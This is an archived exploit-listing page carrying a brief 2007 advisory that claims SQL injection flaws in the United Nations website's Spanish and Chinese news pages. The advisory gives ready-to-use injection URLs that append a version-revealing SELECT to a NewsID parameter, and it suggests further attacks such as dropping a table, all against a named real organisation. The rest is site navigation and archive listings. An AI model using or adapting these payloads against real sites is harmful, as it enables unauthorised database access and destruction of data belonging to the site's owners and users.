unorg-sql.txt

unorg-sql.txt: Posted Feb 28, 2007; Authored by s0cratex; It appears that the un.org web site suffers from SQL injection vulnerabilities.; tags | exploit, web, vulnerability, sql injection; SHA-256 | 8edf0f91665807343bb0e713e66964ee4d23be23665f7b848ae9dcf9eb64d76b; Download | Favorite | View

unorg-sql.txt

un.org SQL Injection vulnerabilities
------------------------------------
by s0cratex


I found a small vulnerability in un.org website...

The bug is type SQL Injection:
https://www.un.org/spanish/News/fullstorynews.asp?NewsID=7702 AND 1 IN 
(SELECT @@version)--
or
https://www.un.org/chinese/News/fullstorynews.asp?NewsID=8000 AND 1 IN 
(SELECT @@version)--

In the example, you can view the version of your Operative System and SQL 
Server...
Other attacks can be possible, for examplo a drop table.

Remember that is the "United Nations" Server...xD

s0cratex@hotmail.com
Nicaragua Exist...
plexinium.com Comming soon

_________________________________________________________________
MSN Amor: busca tu ½ naranja https://latam.msn.com/amor/

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

unorg-sql.txt

unorg-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

unorg-sql.txt

Share This

unorg-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems